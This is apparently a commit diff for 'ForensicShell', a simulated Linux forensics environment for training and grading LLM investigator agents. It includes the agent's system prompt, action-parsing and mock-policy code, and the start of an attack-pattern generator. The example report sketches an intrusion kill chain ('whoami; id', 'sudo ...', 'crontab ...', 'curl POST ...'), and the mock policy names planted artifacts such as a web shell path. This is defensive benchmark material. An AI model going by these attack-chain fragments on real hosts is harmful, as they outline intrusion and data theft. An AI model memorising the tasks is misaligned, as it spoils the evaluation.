Spaces:
Sleeping
Sleeping
Upload folder using huggingface_hub
Browse files- agents/__init__.py +5 -0
- agents/llm_policy.py +337 -0
- openenv_forensic_shell.egg-info/PKG-INFO +3 -0
- openenv_forensic_shell.egg-info/SOURCES.txt +8 -0
- openenv_forensic_shell.egg-info/requires.txt +3 -0
- pyproject.toml +10 -12
- server/attack_patterns.py +288 -0
- server/forensic_shell_environment.py +128 -15
- server/grader.py +18 -1
- server/name_pools.py +62 -0
- server/scenario_generator.py +315 -0
agents/__init__.py
ADDED
|
@@ -0,0 +1,5 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
"""
|
| 2 |
+
Agent policies for ForensicShell. Shared between inference.py (hackathon
|
| 3 |
+
entry point) and rl/rollout.py (training data collector) so both emit
|
| 4 |
+
identical action distributions.
|
| 5 |
+
"""
|
agents/llm_policy.py
ADDED
|
@@ -0,0 +1,337 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
"""
|
| 2 |
+
Shared LLM-backed policy.
|
| 3 |
+
|
| 4 |
+
Exposes one class, `LLMPolicy`, that wraps an OpenAI-compatible client and
|
| 5 |
+
turns a ForensicShellObservation + episode context into a ForensicShellAction.
|
| 6 |
+
Used by inference.py (baseline submission script) and by rl/rollout.py
|
| 7 |
+
(training data collector). Both call sites share parsing + fallback logic so
|
| 8 |
+
bugs never drift between them.
|
| 9 |
+
|
| 10 |
+
The `MockPolicy` class below is a drop-in zero-LLM alternative used when:
|
| 11 |
+
- Groq / HF Router quota is exhausted
|
| 12 |
+
- Running in CI (no outbound network)
|
| 13 |
+
- Doing a quick smoke test
|
| 14 |
+
"""
|
| 15 |
+
|
| 16 |
+
from __future__ import annotations
|
| 17 |
+
|
| 18 |
+
import json
|
| 19 |
+
import re
|
| 20 |
+
import textwrap
|
| 21 |
+
from dataclasses import dataclass, field
|
| 22 |
+
from typing import Any, Dict, List, Optional, Protocol
|
| 23 |
+
|
| 24 |
+
from openai import OpenAI
|
| 25 |
+
|
| 26 |
+
from forensic_shell.models import (
|
| 27 |
+
ForensicReport,
|
| 28 |
+
ForensicShellAction,
|
| 29 |
+
ForensicShellObservation,
|
| 30 |
+
TimelineEvent,
|
| 31 |
+
)
|
| 32 |
+
|
| 33 |
+
|
| 34 |
+
# Kill-chain phase names accepted in a report timeline; parse_action drops
# timeline entries whose "phase" is not a member of this set.
VALID_PHASES = {"login", "recon", "privesc", "persistence", "exfil"}
|
| 35 |
+
|
| 36 |
+
|
| 37 |
+
SYSTEM_PROMPT = textwrap.dedent(
|
| 38 |
+
"""
|
| 39 |
+
You are a digital forensics investigator with shell-like read-only access
|
| 40 |
+
to a compromised Linux host. Investigate by calling actions and then submit
|
| 41 |
+
a final ForensicReport.
|
| 42 |
+
|
| 43 |
+
Reply with ONE JSON object per turn, nothing else — no prose, no backticks.
|
| 44 |
+
Allowed actions:
|
| 45 |
+
|
| 46 |
+
{"action_type": "list_dir", "path": "/some/dir"}
|
| 47 |
+
{"action_type": "read_file", "path": "/some/file", "max_bytes": 2048}
|
| 48 |
+
{"action_type": "grep", "pattern": "substring", "path": "/some/file"}
|
| 49 |
+
{"action_type": "stat", "path": "/some/file"}
|
| 50 |
+
{"action_type": "submit_report","report": {
|
| 51 |
+
"compromised_user": "alice",
|
| 52 |
+
"initial_ip": "198.51.100.77",
|
| 53 |
+
"modified_files": ["/etc/passwd", "/usr/local/bin/.sysd"],
|
| 54 |
+
"backdoor_sha256": "abcdef...",
|
| 55 |
+
"timeline": [
|
| 56 |
+
{"phase": "login", "detail": "ssh from ..."},
|
| 57 |
+
{"phase": "recon", "detail": "whoami; id"},
|
| 58 |
+
{"phase": "privesc", "detail": "sudo ..."},
|
| 59 |
+
{"phase": "persistence", "detail": "crontab ..."},
|
| 60 |
+
{"phase": "exfil", "detail": "curl POST ..."}
|
| 61 |
+
]
|
| 62 |
+
}}
|
| 63 |
+
|
| 64 |
+
Rules:
|
| 65 |
+
- Output EXACTLY ONE JSON object. No commentary, no markdown.
|
| 66 |
+
- Start with list_dir on /var/log and /home to orient yourself.
|
| 67 |
+
- Read /var/log/auth.log to find the compromised user and source IP.
|
| 68 |
+
- For medium/hard tasks, also find modified files and use 'stat' to
|
| 69 |
+
compute the backdoor SHA256 (the stat action returns sha256).
|
| 70 |
+
- For the hard task, reconstruct the attacker's kill chain as an ordered
|
| 71 |
+
timeline: login -> recon -> privesc -> persistence -> exfil.
|
| 72 |
+
- Submit only once you are confident — submit_report ends the episode.
|
| 73 |
+
- You have a strict step budget; do not waste actions.
|
| 74 |
+
"""
|
| 75 |
+
).strip()
|
| 76 |
+
|
| 77 |
+
|
| 78 |
+
# ---------------------------------------------------------------------------
|
| 79 |
+
# Action parsing helpers — shared between real and mock policies
|
| 80 |
+
# ---------------------------------------------------------------------------
|
| 81 |
+
|
| 82 |
+
def parse_action(raw: str) -> ForensicShellAction:
    """
    Robustly parse an LLM reply (or any JSON-ish string) into a
    ForensicShellAction.

    Args:
        raw: Raw model reply. May be empty, wrapped in a markdown fence, or
            surrounded by leading/trailing prose.

    Returns:
        The parsed action. On any failure (empty reply, invalid JSON, JSON
        that is not an object, or field values the action model rejects) the
        no-op ``list_dir('/')`` action is returned instead of raising.
    """

    def _fallback() -> ForensicShellAction:
        return ForensicShellAction(action_type="list_dir", path="/")

    if not raw:
        return _fallback()

    text = raw.strip()
    # Strip accidental markdown fences
    if text.startswith("```"):
        text = text.strip("`")
        head, newline, rest = text.partition("\n")
        # Only drop the first line when it is a language tag such as "json";
        # a fence with the JSON on the same line must keep that line.
        if newline and "{" not in head:
            text = rest
        text = text.strip("`").strip()

    # Locate the outermost {...} span to tolerate leading/trailing prose
    first, last = text.find("{"), text.rfind("}")
    if first != -1 and last > first:
        text = text[first : last + 1]

    try:
        data = json.loads(text)
    except Exception:
        # Deliberate best-effort: any decode problem becomes the no-op action.
        return _fallback()
    # Valid JSON that is not an object (list, number, string, null) has no
    # fields to read, so treat it like a parse failure.
    if not isinstance(data, dict):
        return _fallback()

    action_type = data.get("action_type") or data.get("type") or "list_dir"

    report_obj: Optional[ForensicReport] = None
    report_data = data.get("report")
    if isinstance(report_data, dict):
        timeline_raw = report_data.get("timeline")
        if not isinstance(timeline_raw, (list, tuple)):
            timeline_raw = []
        clean_tl: List[TimelineEvent] = []
        for item in timeline_raw:
            if not isinstance(item, dict):
                continue
            phase = item.get("phase")
            # isinstance guard: an unhashable phase (list/dict) would raise
            # TypeError on the set membership test.
            if isinstance(phase, str) and phase in VALID_PHASES:
                clean_tl.append(
                    TimelineEvent(phase=phase, detail=str(item.get("detail", "")))
                )

        files_raw = report_data.get("modified_files") or []
        if isinstance(files_raw, str):
            # A bare string is one path, not a sequence of characters.
            files_raw = [files_raw]

        try:
            report_obj = ForensicReport(
                compromised_user=report_data.get("compromised_user"),
                initial_ip=report_data.get("initial_ip"),
                modified_files=list(files_raw),
                backdoor_sha256=report_data.get("backdoor_sha256"),
                timeline=clean_tl,
            )
        except Exception:
            # Keep the action (e.g. submit_report) but with an empty report.
            report_obj = ForensicReport()

    try:
        return ForensicShellAction(
            action_type=action_type,
            path=data.get("path"),
            pattern=data.get("pattern"),
            max_bytes=int(data.get("max_bytes") or 2048),
            report=report_obj,
        )
    except Exception:
        return _fallback()
|
| 142 |
+
|
| 143 |
+
|
| 144 |
+
def action_to_str(action: ForensicShellAction) -> str:
    """
    Render an action as a short call-like string.

    Known action types are formatted with the repr of their relevant
    arguments, e.g. ``list_dir('/var/log')`` or ``grep('root','/etc/passwd')``.
    ``submit_report`` is abbreviated to ``submit_report(...)``; any other
    action type is returned as-is.
    """
    kind = action.action_type
    if kind == "list_dir":
        return f"list_dir({action.path!r})"
    if kind == "read_file":
        return f"read_file({action.path!r},{action.max_bytes})"
    if kind == "grep":
        return f"grep({action.pattern!r},{action.path!r})"
    if kind == "stat":
        return f"stat({action.path!r})"
    if kind == "submit_report":
        return "submit_report(...)"
    return kind
|
| 156 |
+
|
| 157 |
+
|
| 158 |
+
# ---------------------------------------------------------------------------
|
| 159 |
+
# Policy protocol
|
| 160 |
+
# ---------------------------------------------------------------------------
|
| 161 |
+
|
| 162 |
+
class PolicyProtocol(Protocol):
    """
    Structural interface shared by the policies in this module.

    A policy exposes a ``name`` and an ``act`` method that maps the latest
    observation, the action history and the step number to the next action.
    """

    # Short identifier for the policy (LLMPolicy uses "llm", MockPolicy "mock").
    name: str

    def act(
        self,
        observation: ForensicShellObservation,
        history: List[str],
        step: int,
    ) -> ForensicShellAction: ...
|
| 171 |
+
|
| 172 |
+
|
| 173 |
+
# ---------------------------------------------------------------------------
|
| 174 |
+
# Real LLM-backed policy
|
| 175 |
+
# ---------------------------------------------------------------------------
|
| 176 |
+
|
| 177 |
+
@dataclass
class LLMPolicy:
    """
    Policy backed by an OpenAI-compatible chat-completions client.

    Each call to ``act`` sends the system prompt plus a freshly built user
    prompt and parses the reply with ``parse_action``.
    """

    # Client used for chat.completions.create calls.
    client: OpenAI
    # Model identifier passed through to the client.
    model: str
    name: str = "llm"
    temperature: float = 0.2
    max_tokens: int = 700
    system_prompt: str = SYSTEM_PROMPT

    def _build_user_prompt(
        self,
        observation: ForensicShellObservation,
        history: List[str],
        step: int,
    ) -> str:
        """
        Build the per-turn user prompt.

        Includes the task description, step counters, the last action error,
        the last action output (truncated to 1500 characters) and the six most
        recent history entries.
        """
        history_block = "\n".join(history[-6:]) if history else "(none yet)"
        last_output = (observation.output or "")[:1500]
        # Assemble line by line instead of dedenting an f-string: interpolated
        # multi-line text has lines at column 0, which makes textwrap.dedent
        # a no-op and leaves the template lines indented.
        lines = [
            f"TASK: {observation.task_description}",
            "",
            f"Step: {step}",
            f"Steps remaining (including this one): {observation.steps_remaining}",
            f"Last action error: {observation.action_error or 'none'}",
            "Last action output:",
            "---",
            last_output,
            "---",
            "Recent history:",
            history_block,
            "",
            "Reply with ONE JSON action object only.",
        ]
        return "\n".join(lines).strip()

    def act(
        self,
        observation: ForensicShellObservation,
        history: List[str],
        step: int,
    ) -> ForensicShellAction:
        """
        Ask the model for the next action.

        Any exception raised while calling the client or reading the reply is
        printed as a debug line and treated as an empty reply, which is then
        handed to ``parse_action``.
        """
        user_prompt = self._build_user_prompt(observation, history, step)
        try:
            completion = self.client.chat.completions.create(
                model=self.model,
                messages=[
                    {"role": "system", "content": self.system_prompt},
                    {"role": "user", "content": user_prompt},
                ],
                temperature=self.temperature,
                max_tokens=self.max_tokens,
                stream=False,
            )
            raw = (completion.choices[0].message.content or "").strip()
        except Exception as exc:  # pragma: no cover - network-dependent
            print(f"[DEBUG] LLMPolicy call failed: {exc}", flush=True)
            raw = ""
        return parse_action(raw)
|
| 235 |
+
|
| 236 |
+
|
| 237 |
+
# ---------------------------------------------------------------------------
|
| 238 |
+
# Mock / heuristic policy — no LLM required
|
| 239 |
+
# ---------------------------------------------------------------------------
|
| 240 |
+
|
| 241 |
+
_ACCEPTED_RE = re.compile(
    r"Accepted (?:password|publickey) for (\S+) from (\S+) port"
)


def _is_rfc1918(ip: str) -> bool:
    """Return True when *ip* is a dotted quad inside an RFC 1918 private range."""
    if ip.startswith(("10.", "192.168.")):
        return True
    octets = ip.split(".")
    # 172.16.0.0/12 spans second octets 16 through 31, not only 172.16.x.x.
    return (
        len(octets) == 4
        and octets[0] == "172"
        and octets[1].isascii()
        and octets[1].isdigit()
        and 16 <= int(octets[1]) <= 31
    )


@dataclass
class MockPolicy:
    """
    Rule-based, no-network policy. Follows a fixed investigation recipe and
    submits based on whatever it observed. Used as a resilient fallback in
    inference.py when no API key is present and in CI where outbound network
    is blocked.
    """

    name: str = "mock"
    # Fixed list of actions to replay; populated by _reset_plan.
    _plan: List[ForensicShellAction] = field(default_factory=list)
    # Index of the next entry of _plan to return.
    _step: int = 0
    _observed_user: Optional[str] = None
    _observed_ip: Optional[str] = None
    _observed_sha: Optional[str] = None
    _observed_paths: List[str] = field(default_factory=list)

    def _reset_plan(self) -> None:
        """Load the fixed investigation plan and clear everything observed so far."""
        self._plan = [
            ForensicShellAction(action_type="list_dir", path="/var/log"),
            ForensicShellAction(action_type="grep", pattern="Accepted ", path="/var/log/auth.log"),
            ForensicShellAction(action_type="list_dir", path="/etc/cron.d"),
            ForensicShellAction(action_type="list_dir", path="/usr/local/bin"),
            ForensicShellAction(action_type="list_dir", path="/usr/local/sbin"),
            ForensicShellAction(action_type="list_dir", path="/var/www/html"),
            ForensicShellAction(action_type="list_dir", path="/tmp/.staging"),
            ForensicShellAction(action_type="stat", path="/usr/local/bin/.sysd"),
            ForensicShellAction(action_type="stat", path="/usr/local/sbin/.healthcheck"),
            ForensicShellAction(action_type="stat", path="/var/www/html/shell.php"),
            ForensicShellAction(action_type="stat", path="/tmp/.staging/dump.sql"),
            ForensicShellAction(action_type="stat", path="/etc/cron.d/sysd-sync"),
        ]
        self._step = 0
        self._observed_user = None
        self._observed_ip = None
        self._observed_sha = None
        self._observed_paths = []

    def _harvest(self, observation: ForensicShellObservation) -> None:
        """
        Extract login and hash evidence from the latest observation output.

        The first accepted login from a non-RFC1918 address wins; a login
        from a private address is only recorded while no user is known yet.
        The first ``sha256=`` line seen is kept, together with any ``path=``
        line from that same output.
        """
        out = observation.output or ""
        lines = out.splitlines()

        # Pull first accepted-login from grep output (prefer non-RFC1918)
        for line in lines:
            m = _ACCEPTED_RE.search(line)
            if not m:
                continue
            user, ip = m.group(1), m.group(2)
            if not _is_rfc1918(ip):
                self._observed_user = user
                self._observed_ip = ip
                break
            if self._observed_user is None:
                self._observed_user = user
                self._observed_ip = ip

        # Pull sha256 from stat output
        # NOTE(review): paths are only recorded alongside the first sha256
        # seen, so at most one stat result feeds modified_files — confirm
        # this is intended.
        if "sha256=" in out and self._observed_sha is None:
            for line in lines:
                if line.startswith("sha256="):
                    self._observed_sha = line.split("=", 1)[1].strip()
                    # stat output also carries path= — grab it if present
                    for other in lines:
                        if other.startswith("path="):
                            p = other.split("=", 1)[1].strip()
                            if p and p not in self._observed_paths:
                                self._observed_paths.append(p)
                    break

    def _final_submit(self) -> ForensicShellAction:
        """Build the submit_report action from whatever has been observed."""
        timeline = [
            TimelineEvent(phase=p, detail="auto")
            for p in ("login", "recon", "privesc", "persistence", "exfil")
        ]
        report = ForensicReport(
            compromised_user=self._observed_user,
            initial_ip=self._observed_ip,
            modified_files=list(self._observed_paths),
            backdoor_sha256=self._observed_sha,
            timeline=timeline,
        )
        return ForensicShellAction(action_type="submit_report", report=report)

    def act(
        self,
        observation: ForensicShellObservation,
        history: List[str],
        step: int,
    ) -> ForensicShellAction:
        """
        Return the next planned action, or the final report once the plan
        is exhausted. The plan and observed state are reset when ``step`` is 1.
        """
        if step == 1:
            self._reset_plan()
        self._harvest(observation)
        if self._step < len(self._plan):
            action = self._plan[self._step]
            self._step += 1
            return action
        return self._final_submit()
|
openenv_forensic_shell.egg-info/PKG-INFO
CHANGED
|
@@ -4,6 +4,9 @@ Version: 0.1.0
|
|
| 4 |
Summary: Forensic Shell environment for OpenEnv
|
| 5 |
Requires-Python: >=3.10
|
| 6 |
Requires-Dist: openenv-core[core]>=0.2.2
|
|
|
|
| 7 |
Provides-Extra: dev
|
| 8 |
Requires-Dist: pytest>=8.0.0; extra == "dev"
|
| 9 |
Requires-Dist: pytest-cov>=4.0.0; extra == "dev"
|
|
|
|
|
|
|
|
|
| 4 |
Summary: Forensic Shell environment for OpenEnv
|
| 5 |
Requires-Python: >=3.10
|
| 6 |
Requires-Dist: openenv-core[core]>=0.2.2
|
| 7 |
+
Requires-Dist: openai>=1.40.0
|
| 8 |
Provides-Extra: dev
|
| 9 |
Requires-Dist: pytest>=8.0.0; extra == "dev"
|
| 10 |
Requires-Dist: pytest-cov>=4.0.0; extra == "dev"
|
| 11 |
+
Requires-Dist: pytest-asyncio>=0.23.0; extra == "dev"
|
| 12 |
+
Requires-Dist: pytest-socket>=0.7.0; extra == "dev"
|
openenv_forensic_shell.egg-info/SOURCES.txt
CHANGED
|
@@ -1,8 +1,13 @@
|
|
| 1 |
README.md
|
|
|
|
|
|
|
|
|
|
| 2 |
pyproject.toml
|
| 3 |
./__init__.py
|
| 4 |
./client.py
|
| 5 |
./models.py
|
|
|
|
|
|
|
| 6 |
openenv_forensic_shell.egg-info/PKG-INFO
|
| 7 |
openenv_forensic_shell.egg-info/SOURCES.txt
|
| 8 |
openenv_forensic_shell.egg-info/dependency_links.txt
|
|
@@ -11,6 +16,9 @@ openenv_forensic_shell.egg-info/requires.txt
|
|
| 11 |
openenv_forensic_shell.egg-info/top_level.txt
|
| 12 |
server/__init__.py
|
| 13 |
server/app.py
|
|
|
|
| 14 |
server/forensic_shell_environment.py
|
| 15 |
server/grader.py
|
|
|
|
|
|
|
| 16 |
server/scenarios.py
|
|
|
|
| 1 |
README.md
|
| 2 |
+
__init__.py
|
| 3 |
+
client.py
|
| 4 |
+
models.py
|
| 5 |
pyproject.toml
|
| 6 |
./__init__.py
|
| 7 |
./client.py
|
| 8 |
./models.py
|
| 9 |
+
agents/__init__.py
|
| 10 |
+
agents/llm_policy.py
|
| 11 |
openenv_forensic_shell.egg-info/PKG-INFO
|
| 12 |
openenv_forensic_shell.egg-info/SOURCES.txt
|
| 13 |
openenv_forensic_shell.egg-info/dependency_links.txt
|
|
|
|
| 16 |
openenv_forensic_shell.egg-info/top_level.txt
|
| 17 |
server/__init__.py
|
| 18 |
server/app.py
|
| 19 |
+
server/attack_patterns.py
|
| 20 |
server/forensic_shell_environment.py
|
| 21 |
server/grader.py
|
| 22 |
+
server/name_pools.py
|
| 23 |
+
server/scenario_generator.py
|
| 24 |
server/scenarios.py
|
openenv_forensic_shell.egg-info/requires.txt
CHANGED
|
@@ -1,5 +1,8 @@
|
|
| 1 |
openenv-core[core]>=0.2.2
|
|
|
|
| 2 |
|
| 3 |
[dev]
|
| 4 |
pytest>=8.0.0
|
| 5 |
pytest-cov>=4.0.0
|
|
|
|
|
|
|
|
|
| 1 |
openenv-core[core]>=0.2.2
|
| 2 |
+
openai>=1.40.0
|
| 3 |
|
| 4 |
[dev]
|
| 5 |
pytest>=8.0.0
|
| 6 |
pytest-cov>=4.0.0
|
| 7 |
+
pytest-asyncio>=0.23.0
|
| 8 |
+
pytest-socket>=0.7.0
|
pyproject.toml
CHANGED
|
@@ -15,23 +15,17 @@ description = "Forensic Shell environment for OpenEnv"
|
|
| 15 |
requires-python = ">=3.10"
|
| 16 |
dependencies = [
|
| 17 |
# Core OpenEnv runtime (provides FastAPI server + HTTP client types)
|
| 18 |
-
# install from github
|
| 19 |
-
# "openenv-core[core] @ git+https://github.com/meta-pytorch/OpenEnv.git",
|
| 20 |
"openenv-core[core]>=0.2.2",
|
| 21 |
-
#
|
| 22 |
-
|
| 23 |
-
# Examples:
|
| 24 |
-
# "numpy>=1.19.0",
|
| 25 |
-
# "torch>=2.0.0",
|
| 26 |
-
# "gymnasium>=0.29.0",
|
| 27 |
-
# "openspiel>=1.0.0",
|
| 28 |
-
# "smolagents>=1.22.0,<2",
|
| 29 |
]
|
| 30 |
|
| 31 |
[project.optional-dependencies]
|
| 32 |
dev = [
|
| 33 |
"pytest>=8.0.0",
|
| 34 |
"pytest-cov>=4.0.0",
|
|
|
|
|
|
|
| 35 |
]
|
| 36 |
|
| 37 |
[project.scripts]
|
|
@@ -41,5 +35,9 @@ server = "forensic_shell.server.app:main"
|
|
| 41 |
|
| 42 |
[tool.setuptools]
|
| 43 |
include-package-data = true
|
| 44 |
-
packages = [
|
| 45 |
-
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 15 |
requires-python = ">=3.10"
|
| 16 |
dependencies = [
|
| 17 |
# Core OpenEnv runtime (provides FastAPI server + HTTP client types)
|
|
|
|
|
|
|
| 18 |
"openenv-core[core]>=0.2.2",
|
| 19 |
+
# ForensicShell needs the OpenAI client for LLM-backed policies
|
| 20 |
+
"openai>=1.40.0",
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 21 |
]
|
| 22 |
|
| 23 |
[project.optional-dependencies]
|
| 24 |
dev = [
|
| 25 |
"pytest>=8.0.0",
|
| 26 |
"pytest-cov>=4.0.0",
|
| 27 |
+
"pytest-asyncio>=0.23.0",
|
| 28 |
+
"pytest-socket>=0.7.0",
|
| 29 |
]
|
| 30 |
|
| 31 |
[project.scripts]
|
|
|
|
| 35 |
|
| 36 |
[tool.setuptools]
|
| 37 |
include-package-data = true
|
| 38 |
+
packages = [
|
| 39 |
+
"forensic_shell",
|
| 40 |
+
"forensic_shell.server",
|
| 41 |
+
"forensic_shell.agents",
|
| 42 |
+
]
|
| 43 |
+
package-dir = { "forensic_shell" = ".", "forensic_shell.server" = "server", "forensic_shell.agents" = "agents" }
|
server/attack_patterns.py
ADDED
|
@@ -0,0 +1,288 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
"""
|
| 2 |
+
Attack pattern templates used by the scenario generator.
|
| 3 |
+
|
| 4 |
+
Each pattern is a callable `build(ctx) -> PatternArtifacts` where `ctx` is a
|
| 5 |
+
SimpleNamespace with fields: rng, user, ip, host, ts_base, backdoor_sha256,
|
| 6 |
+
backdoor_bytes, backdoor_path, short (slug embedded in attacker file names).
|
| 7 |
+
|
| 8 |
+
The callable returns a dict describing:
|
| 9 |
+
- auth_log_lines: list[str] appended to /var/log/auth.log
|
| 10 |
+
- bash_history: str contents of the compromised user's .bash_history
|
| 11 |
+
- modified_files: dict[path, content] — system files changed by the attacker
|
| 12 |
+
- modified_paths: list[str] — the subset the grader expects (subset of modified_files)
|
| 13 |
+
- timeline: list[dict(phase, detail)] — 5-phase kill chain for hard tier
|
| 14 |
+
- pattern_tag: short slug used in task_id
|
| 15 |
+
|
| 16 |
+
All timestamps are rendered relative to ctx.ts_base (a datetime) so every log
|
| 17 |
+
looks self-consistent. Nothing here touches global random state.
|
| 18 |
+
"""
|
| 19 |
+
|
| 20 |
+
from datetime import timedelta
|
| 21 |
+
|
| 22 |
+
|
| 23 |
+
def _fmt_ts(ts):
    """Format *ts* with ``%b %d %H:%M:%S``, e.g. ``Jan 05 03:04:05``."""
    return ts.strftime("%b %d %H:%M:%S")
|
| 25 |
+
|
| 26 |
+
|
| 27 |
+
# ---------------------------------------------------------------------------
|
| 28 |
+
# Pattern 1 — SSH brute force -> wget payload -> cron persistence
|
